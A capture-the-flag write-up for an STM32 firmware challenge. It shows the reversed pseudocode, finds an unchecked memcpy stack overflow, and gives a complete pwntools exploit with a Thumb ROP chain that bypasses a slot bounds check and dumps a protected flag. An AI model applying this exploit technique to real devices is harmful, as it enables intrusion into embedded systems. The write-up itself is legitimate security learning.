Level 9 - HWisntThatHardv2 (hardware pwn)

This challenge requires us to find a vulnerability in STM32 firmware and exploit it to read the flag from memory. We are given an STM32 emulator to run the firmware, since we do not have access to the physical hardware. To better understand the challenge structure, we first look at the config file, config.yaml:

cpu:
  svd: stm32f407.svd
  vector_table: 0x08000000
regions:
  - name: ROM
    start: 0x08000000
    load: csit_iot.bin
    size: 0x80000
  - name: RAM-CCM
    start: 0x10000000
    size: 0x18000
  - name: RAM
    start: 0x20000000
    size: 0x20000
framebuffers:
peripherals:
devices:
  spi_flash:
    - peripheral: SPI3
      jedec_id: 0xef4016
      file: ext-flash.bin
      size: 0x400000
  usart_probe:
    - peripheral: USART1
patches:

The firmware logic is in csit_iot.bin, which is loaded at address 0x08000000. The config also attaches an external SPI flash, backed by ext-flash.bin, to SPI3, and a probe to USART1.
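
To keep the memory map straight while reversing, it helps to check which region an address falls into. The snippet below is a minimal sketch that hard-codes the three regions from config.yaml; region_of is a hypothetical helper name of mine, not something the emulator provides.

```python
# Memory regions copied from config.yaml as (name, start, size).
REGIONS = [
    ("ROM", 0x08000000, 0x80000),
    ("RAM-CCM", 0x10000000, 0x18000),
    ("RAM", 0x20000000, 0x20000),
]


def region_of(addr):
    """Return the name of the region containing addr, or None (hypothetical helper)."""
    for name, start, size in REGIONS:
        if start <= addr < start + size:
            return name
    return None


print(region_of(0x08000000))  # ROM
print(region_of(0x20001000))  # RAM
print(region_of(0x40020000))  # None (not in any listed region)
```

Any code address we later want to return to has to land in ROM, i.e. between 0x08000000 and 0x0807ffff.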

If we look at ext-flash.bin we see the following:

The first 32 bytes hold the real flag we're interested in, and the rest of the data consists of fake flags. Counting the credits entry, there are 16 entries.
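
The layout described above can be sketched as follows. This is only an illustration under the assumption that every entry occupies 32 bytes and is padded with zero bytes. The helper names are mine, and the demo image is synthetic stand-in data, not the contents of ext-flash.bin.

```python
SLOT_SIZE = 32  # bytes per entry, as described above
NUM_SLOTS = 16  # real flag, fake flags and the credits entry


def split_slots(image):
    """Cut the start of a flash image into NUM_SLOTS chunks of SLOT_SIZE bytes."""
    return [image[i * SLOT_SIZE:(i + 1) * SLOT_SIZE] for i in range(NUM_SLOTS)]


def slot_text(raw):
    """Drop trailing zero padding (assumed) and decode the rest as ASCII."""
    return raw.rstrip(b"\x00").decode("ascii", errors="replace")


# Synthetic stand-in image; for the real file use open("ext-flash.bin", "rb").read().
demo = b"".join(
    f"ENTRY_{i}".encode().ljust(SLOT_SIZE, b"\x00") for i in range(NUM_SLOTS)
)
for index, raw in enumerate(split_slots(demo)[:3]):
    print(index, slot_text(raw))
```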

Let's look at the Dockerfile:

FROM ubuntu
WORKDIR /tisc

RUN apt-get update && apt-get install -y socat

COPY csit_iot.bin .
COPY ext-flash.bin .
COPY stm32-emulator .
COPY stm32f407.svd .
COPY config.yaml .

ENTRYPOINT socat tcp-l:8000,fork,reuseaddr exec:"timeout 60s ./stm32-emulator config.yaml"

The STM32 emulator is run with the provided config file. Listing the emulator's options gives the following:

STM32 Emulator

USAGE:
    stm32-emulator [OPTIONS] <CONFIG>

ARGS:
    <CONFIG>    Config file

OPTIONS:
    -b, --busy-loop-stop
            Stop emulation when the program reaches a busy loop

    -c, --color <COLOR>
            Colorize output [default: auto] [possible values: auto, always, never]

    -d, --dump-stack <DUMP_STACK>
            Dump stack at the end. Parameter is the number of words to print

    -h, --help
            Print help information

    -i, --interrupt-period <INTERRUPT_PERIOD>
            Run pending interrupts every N instructions Shorter is more correct, but is slower
            [default: 1]

    -m, --max-instructions <MAX_INSTRUCTIONS>
            Maximum number of instructions to execute

    -s, --stop-addr <STOP_ADDR>
            Stop emulation when pc reaches this address

    -v, --verbose
            Verbosity. Can be repeated. -vvvv is the maximum

However, when I tried the different options, they didn't seem to actually work. I later found the stm32-emulator repo on GitHub, but that version is not set up to accept user input from stdin. In other words, neither the provided emulator nor the one built from source worked well for debugging, so I decided to start by reversing the firmware binary instead.

With the help of my IDA Pro MCP + GitHub Copilot setup, I got a rough understanding of how the program works, and learnt that it accepts 2 main types of input, both in JSON:

  1. View the 32 bytes stored at a given slot, from 1 to 15 inclusive. The request has the format

{"slot":x} (reads slot x)

The response looks something like

Slot 1 contains: [84,73,83,67,123,70,65,75,69,95,70,76,65,71,95,71,79,69,83,95,72,69,82,69,125,0,0,0,0,0,0,0]

  2. Count how many bytes of your provided array match the data in the slot. The request is something like:

{"slot":1,"data":[1,2,3,...]}

And the response is something like:

Checking... 
Result: 1

where 1 is the number of byte positions at which our array matches the slot data.
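
The two request types and the read response can be sketched in Python as below. This is a minimal illustration: the helper names are mine, and terminating each request with a newline is an assumption (it matches what sendline does in the exploit later on).

```python
import json
import re


def read_request(slot):
    """Build a request that reads one slot."""
    return json.dumps({"slot": slot}).encode() + b"\n"


def compare_request(slot, data):
    """Build a request that compares data against one slot."""
    return json.dumps({"slot": slot, "data": list(data)}).encode() + b"\n"


def parse_slot_response(line):
    """Parse 'Slot N contains: [...]' into (slot, bytes), or None if no match."""
    match = re.search(r"Slot (\d+) contains: \[([\d,]*)\]", line)
    if match is None:
        return None
    values = [int(v) for v in match.group(2).split(",") if v]
    return int(match.group(1)), bytes(values)


sample = ("Slot 1 contains: [84,73,83,67,123,70,65,75,69,95,70,76,65,71,95,"
          "71,79,69,83,95,72,69,82,69,125,0,0,0,0,0,0,0]")
slot, raw = parse_slot_response(sample)
print(slot, raw.rstrip(b"\x00").decode())  # 1 TISC{FAKE_FLAG_GOES_HERE}
```

Decoding the sample response from above confirms that slot 1 holds one of the fake flags.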

Reversing the binary, we identify a function main at address 0x8007900, which calls a function parse_command at address 0x8007260.

main then has the following pseudocode:

if ( valid_command )
{
  v13 = slot_index;
  if ( (unsigned int)(slot_index - 1) <= 0xE )// 1 <= index <= 15
  {
    memset_(rx_byte, 0, 32);
    spi_cmd[0] = 3;
    spi_cmd[1] = __rev16(32 * v13);
    gpio_write_pin(1073872896, 0x8000, 0);
    spi_tx(&g_spi, spi_cmd, 4, -1);
    spi_rx(&g_spi, rx_byte, 32, -1);
    gpio_write_pin(1073872896, 0x8000, 1);
    if ( has_user_data )
    {
      check_data_and_format_result((int)rx_byte, &v41);
      if ( v41 )
        mem_free(v41, v42 - v41);
    }
    else
    {
      memcpy_(g_outbuf, (int)"Slot ", 5);
      appended = sb_append_uint(g_outbuf, v13);
      memcpy_(appended, (int)" contains: [", 12);
      p_slot_bytes = &slot_bytes;
      while ( 1 )
      {
        v26 = (unsigned __int8)*++p_slot_bytes;
        sb_append_uint(g_outbuf, v26);
        if ( p_slot_bytes == &slot_bytes_end )
          break;
        memcpy_(g_outbuf, (int)",", 1);
      }
      v27 = memcpy_(g_outbuf, (int)"]", 1);
      v28 = (int (__fastcall *)(int, int))g_outbuf;
      v29 = *(_BYTE **)((char *)&g_outbuf[31] + *(_DWORD *)(g_outbuf[0] - 12));
      if ( !v29 )
        _throw_bad_alloc((int)v27);
      if ( v29[28] )
      {
        v5 = (unsigned __int8)v29[39];
      }
      else
      {
        sub_800B34A(v29);
        v28 = sub_8006C44;
        v34 = *(int (__fastcall **)(int, int))(*(_DWORD *)v29 + 24);
        if ( v34 != sub_8006C44 )
          v5 = v34((int)v29, 10);
      }
      v30 = uart_write_buf(g_outbuf, v5, (int)v28);
      uart_write_cstr(v30, v31);
    }
    if ( line_buf != (char *)line_sso )
      mem_free(line_buf, line_sso[0] + 1);
    goto LABEL_28;
  }
  v19 = memcpy_(g_outbuf, (int)"Out of bounds!", 14);

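As you can see, the unsigned comparison (slot_index - 1) <= 0xE ensures that the provided index is >= 1 and <= 15: for index 0 the subtraction wraps around to 0xFFFFFFFF, which fails the check. So we can't directly read the flag at slot 0.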
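
To make the check and the resulting flash read concrete, here is a small Python model of both. It is a sketch under two assumptions of mine: spi_cmd is an array of 16-bit values stored little-endian, so the two stores produce the 4 bytes passed to spi_tx, and 0x03 is the usual read command of SPI NOR flash followed by a 24-bit big-endian address.

```python
import struct


def slot_allowed(slot):
    """Model of (unsigned int)(slot_index - 1) <= 0xE with 32-bit wraparound."""
    return ((slot - 1) & 0xFFFFFFFF) <= 0xE


def rev16(halfword):
    """Swap the two bytes of a 16-bit value, like __rev16 on the low halfword."""
    return ((halfword & 0xFF) << 8) | ((halfword >> 8) & 0xFF)


def spi_read_command(slot):
    """Bytes sent by spi_tx: halfword 3, then halfword rev16(32 * slot)."""
    return struct.pack("<HH", 3, rev16((32 * slot) & 0xFFFF))


print([slot_allowed(s) for s in (0, 1, 15, 16)])  # [False, True, True, False]
print(spi_read_command(1).hex())  # 03000020 -> read from flash offset 0x20
print(spi_read_command(0).hex())  # 03000000 -> read from flash offset 0x00
```

Under these assumptions, slot n is simply the 32 bytes at flash offset 32 * n, so slot 0 is the real flag at the start of the flash image.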

If there is user data we enter a function check_data_and_format_result at 0x800023c, otherwise we enter an else block which simply prints the 32 bytes of slot data.

Now let's look at check_data_and_format_result:

int __fastcall check_data_and_format_result(int a1, _DWORD *a2)
{
  int num_matches; // r5
  _DWORD *v3; // r0
  _BYTE *v4; // r6
  _DWORD *v5; // r4
  int v6; // r1
  int v7; // r0
  int (*v9)(); // r3

  num_matches = j_comparison(a1, a2);
  memcpy_(g_outbuf, "Result: ", 8);
  v3 = (_DWORD *)sb_append_uint(g_outbuf, num_matches);
  v4 = *(_BYTE **)((char *)v3 + *(_DWORD *)(*v3 - 12) + 124);
  if ( !v4 )
    _throw_bad_alloc(v3);
  v5 = v3;
  if ( v4[28] )
  {
    v6 = (unsigned __int8)v4[39];
  }
  else
  {
    sub_800B34A(v4);
    v9 = *(int (**)())(*(_DWORD *)v4 + 24);
    v6 = 10;
    if ( v9 != sub_8006C44 )
      v6 = ((int (__fastcall *)(_BYTE *, int))v9)(v4, 10);
  }
  v7 = uart_write_buf(v5, v6);
  uart_write_cstr(v7);
  return num_matches;
}

Let's look at the comparison functions and the memcpy_ helper they use:

int __fastcall j_comparison(_DWORD *a1, _DWORD *a2)
{
  return comparison(a1, a2);
}

int __fastcall comparison(_DWORD *a1, _DWORD *a2)
{
  int similarities; // r5
  char *v4; // r0
  char *v5; // r3
  int v6; // r1
  int v7; // t1
  int v8; // t1
  int *v9; // r0
  int (__fastcall *v10)(int, int); // r2
  _BYTE *v11; // r4
  int v12; // r1
  int *v13; // r0
  int v14; // r1
  int (__fastcall *v16)(int, int); // r3
  char v17; // [sp+0h] [bp-31h] BYREF
  int v18; // [sp+1h] [bp-30h] BYREF
  char v19; // [sp+20h] [bp-11h] BYREF

  memcpy_(&v18, *a2, a2[1] - *a2);
  similarities = 0;
  v4 = (char *)a1 - 1;
  v5 = &v17;
  // count number of array similarities
  do
  {
    v7 = (unsigned __int8)*++v5;
    v6 = v7;
    v8 = (unsigned __int8)*++v4;
    if ( v6 == v8 )
      ++similarities;
  }
  while ( &v19 != v5 );
  v9 = memcpy_(g_outbuf, (int)"Checking... ", 12);
  v11 = *(_BYTE **)((char *)&g_outbuf[31] + *(_DWORD *)(g_outbuf[0] - 12));
  if ( !v11 )
    _throw_bad_alloc((int)v9);
  if ( v11[28] )
  {
    v12 = (unsigned __int8)v11[39];
  }
  else
  {
    sub_800B34A(v11);
    v10 = sub_8006C44;
    v16 = *(int (__fastcall **)(int, int))(*(_DWORD *)v11 + 24);
    v12 = 10;
    if ( v16 != sub_8006C44 )
      v12 = v16((int)v11, 10);
  }
  v13 = uart_write_buf(g_outbuf, v12, (int)v10);
  uart_write_cstr(v13, v14);
  return similarities;
}

int __fastcall memcpy_(int result, char *a2, int a3)
{
  char *v3; // r2
  int i; // r3
  char v5; // t1

  v3 = &a2[a3];
  for ( i = result - 1; a2 != v3; ++i )
  {
    v5 = *a2++;
    *(_BYTE *)(i + 1) = v5;
  }
  return result;
}

At this point I tried fuzzing the program, and the first thing I tried was a data array longer than 32 bytes. That crashed the program, which made me suspect that a long array corrupts memory somewhere. I then asked ChatGPT to identify potential buffer overflow vulnerabilities in the program, and learnt that the memcpy_ call in the comparison function is vulnerable: it copies a2[1] - *a2 bytes, i.e. the full length of our array, into the fixed-size stack buffer v18 without any length check. If the array has more than 32 bytes, memcpy_ writes past the end of the buffer. The pseudocode places v18 at sp+1, that is, 1 byte above the stack pointer. With a long enough array we can therefore overflow into the saved return address (saved PC) of comparison and control the program's execution flow.

Let's look at the function epilogue (cleanup) of comparison:

LDR             R0, =g_outbuf
BL              uart_write_buf
BL              uart_write_cstr
MOV             R0, R5
ADD             SP, SP, #0x24 ; '$'
POP             {R4,R5,PC}

Although the pseudocode shows v18 at sp+1, I found out by trial and error that the data is actually copied to address sp. Since the epilogue adds 0x24 to SP and then pops R4 and R5 before PC, the distance between the memcpy_ target and the saved PC is 0x24 + 2 * 4 = 44 bytes (2 * 4 because two registers are popped first and each is 32 bits / 4 bytes wide).

Therefore, after 44 bytes of padding in the array, the next 4 bytes overwrite the saved PC.
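
The offset arithmetic can be double-checked with a tiny model of the epilogue. This is a sketch that assumes, as found by trial and error above, that our data starts exactly at SP. The marker value 0xdeadbeef is just a placeholder for the return address.

```python
import struct

FRAME_ADJUST = 0x24    # ADD SP, SP, #0x24
POPPED_BEFORE_PC = 2   # R4 and R5 are popped before PC
PC_OFFSET = FRAME_ADJUST + 4 * POPPED_BEFORE_PC


def simulate_epilogue(stack):
    """Model ADD SP, SP, #0x24; POP {R4,R5,PC} on the bytes starting at SP."""
    r4, r5, pc = struct.unpack_from("<III", stack, FRAME_ADJUST)
    return r4, r5, pc


marker = 0xDEADBEEF  # placeholder return address
payload = bytes(PC_OFFSET) + struct.pack("<I", marker)

print(PC_OFFSET)  # 44
print([hex(v) for v in simulate_epilogue(payload)])  # ['0x0', '0x0', '0xdeadbeef']
```

Note that the 8 bytes just before the saved PC end up in R4 and R5, so the payload controls those two registers as well.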

Now, to get the flag we simply need to read slot 0. Let's see the relevant part of main for reading slot data again:

v13 = slot_index;
if ( (unsigned int)(slot_index - 1) <= 0xE )// 1 <= index <= 15
{
  memset_(rx_byte, 0, 32);
  spi_cmd[0] = 3;
  spi_cmd[1] = __rev16(32 * v13);
  gpio_write_pin(1073872896, 0x8000, 0);
  spi_tx(&g_spi, spi_cmd, 4, -1);
  spi_rx(&g_spi, rx_byte, 32, -1);
  gpio_write_pin(1073872896, 0x8000, 1);
  if ( has_user_data )
  {
    check_data_and_format_result((int)rx_byte, &v41);
    if ( v41 )
      mem_free(v41, v42 - v41);
  }
  else
  {
    memcpy_(g_outbuf, (int)"Slot ", 5);
    appended = sb_append_uint(g_outbuf, v13);
    memcpy_(appended, (int)" contains: [", 12);
    ...

So our objective is to have slot_index = 0 and has_user_data = 0.

How do we achieve slot_index = 0? We can jump into the middle of the main function, just after the <= 0xE check, and use Return Oriented Programming (ROP) to make sure the register holding slot_index is 0 when we get there. Let's look at the corresponding asm:

LDR             R4, [SP,#0xA8+slot_index]
SUBS            R3, R4, #1
CMP             R3, #0xE <- comparison!
BHI.W           loc_8007C20 

if not out of bounds:
MOVS            R2, #0x20 ; ' ' <- instruction at address 0x8007b14
MOVS            R1, #0
ADD             R0, SP, #0xA8+var_40
BL              memset_
MOVS            R1, #3
LSLS            R3, R4, #5
REV16           R3, R3
STRH.W          R1, [SP,#0xA8+var_8C]
LDR             R0, =0x40020000
STRH.W          R3, [SP,#0xA8+var_8A]
MOVS            R2, #0
MOV.W           R1, #0x8000
...

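So we need to reach the instruction at address 0x8007b14 with the slot register zeroed. From the listing, the slot index itself is held in R4 (R3 only holds slot_index - 1 for the check and is recomputed from R4 by LSLS R3, R4, #5), and the POP {R4,R5,PC} epilogue of comparison already loads R4 from our payload, so that word must stay 0. I additionally zero R3 by looking for a pop {R3, ..., PC} gadget. Note that in ARM Thumb mode we also need to set the lowest bit (| 1) of every code address we return to, so that the core stays in Thumb state.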

I found a pop {R3, PC} gadget at address 0x0801058e.
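
As a quick illustration of the Thumb bit, the two return addresses can be encoded like this. The helper names thumb and p32 are mine (pwntools has its own p32, but this sketch only uses the standard library).

```python
import struct


def thumb(addr):
    """Set bit 0 so that loading the address into PC keeps the core in Thumb state."""
    return addr | 1


def p32(value):
    """Pack a 32-bit value as little-endian bytes."""
    return struct.pack("<I", value)


POP_R3_PC = 0x0801058E         # pop {R3, PC} gadget
MAIN_AFTER_CHECK = 0x08007B14  # first instruction after the bounds check

print(list(p32(thumb(POP_R3_PC))))         # [143, 5, 1, 8]
print(list(p32(thumb(MAIN_AFTER_CHECK))))  # [21, 123, 0, 8]
```

These are the byte lists that go into the JSON data array wherever the payload overwrites a saved PC.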

The next problem: how do we set has_user_data = 0? Well, has_user_data is stored on the stack of the main function at SP+0x5C, so our overflow can simply continue up the stack and overwrite it with a byte from the array payload.

So the final ROP chain outline will be something like:

  1. Return to 0x0801058f to pop r3 and pc

  2. Return to the middle of the main function at address 0x8007b15 (0x8007b14 | 1), which now treats our slot as 0 because R4, popped from our payload together with R5, and R3 are both 0.

  3. Overwrite the byte at address sp+0x5C with \x00 to set has_user_data = 0.
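
The offsets in this outline can be checked offline before sending anything. The sketch below assumes the copy starts at SP inside comparison (see above) and that SP+0x5C is measured from the stack pointer after both returns have popped their words.

```python
import struct

PC_OFFSET = 0x24 + 2 * 4     # distance from buffer start to the saved PC
HAS_USER_DATA_OFFSET = 0x5C  # has_user_data relative to SP inside main

chain = b"".join([
    bytes(PC_OFFSET),                   # buffer, padding, saved R4 and R5 (all zero)
    struct.pack("<I", 0x0801058E | 1),  # 1. pop {R3, PC} gadget
    struct.pack("<I", 0),               #    value popped into R3
    struct.pack("<I", 0x08007B14 | 1),  # 2. middle of main, after the bounds check
])
sp_in_main = len(chain)  # SP once main resumes, relative to the buffer start

# 3. pad up to has_user_data and clear it
payload = chain + bytes(HAS_USER_DATA_OFFSET) + b"\x00"

print(sp_in_main)                         # 56
print(sp_in_main + HAS_USER_DATA_OFFSET)  # 148, index of the has_user_data byte
print(len(payload))                       # 149
```

list(payload) then gives the integer array that goes into the "data" field of the JSON request.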

Below is my full exploit:

from pwn import *
import json

# Remote target runs the firmware and bridges UART over TCP
p = remote("chals.tisc25.ctf.sg", 51728)
context.log_level = 'debug'

pl = [0] * 32 # fills the 32-byte buffer in comparison
pl += [0] * 4 # padding up to the 0x24 bytes added to SP in the epilogue
# the epilogue then pops r4, r5, pc
pl += [0,0,0,0,0,0,0,0] # r4, r5 (r4 = 0 becomes the slot index)
pl += [0x8f, 0x05, 0x01, 0x08] # pc: pop {r3, pc} gadget at 0x0801058e, | 1 for Thumb
pl += [0, 0, 0, 0] # r3
pl += [0x15, 0x7b, 0x00, 0x08] # pc: 0x8007b14 (middle of main), | 1 for Thumb
pl += [0] * 0x5c # padding up to has_user_data at sp+0x5c
pl += [0] # has_user_data = 0

data = {"slot": 1, "data": pl}
p.sendline(json.dumps(data).encode())
print(p.recvrepeat(1))
p.close() # TISC{3mul4t3d_uC_pwn3d}
# Slot 0 contains: [84,73,83,67,123,51,109,117,108,52,116,51,100,95,117,67,95,112,119,110,51,100,125,0,0,0,0,0,0,0,0,0]
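
For completeness, the byte list in the response can be turned back into the flag string with a few lines of Python. This is a small sketch that assumes the response has exactly the format shown in the comment above.

```python
import re

response = ("Slot 0 contains: [84,73,83,67,123,51,109,117,108,52,116,51,100,"
            "95,117,67,95,112,119,110,51,100,125,0,0,0,0,0,0,0,0,0]")

# Take everything after the opening bracket and collect the decimal values.
values = [int(v) for v in re.findall(r"\d+", response.split("[", 1)[1])]
flag = bytes(values).rstrip(b"\x00").decode()
print(flag)  # TISC{3mul4t3d_uC_pwn3d}
```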
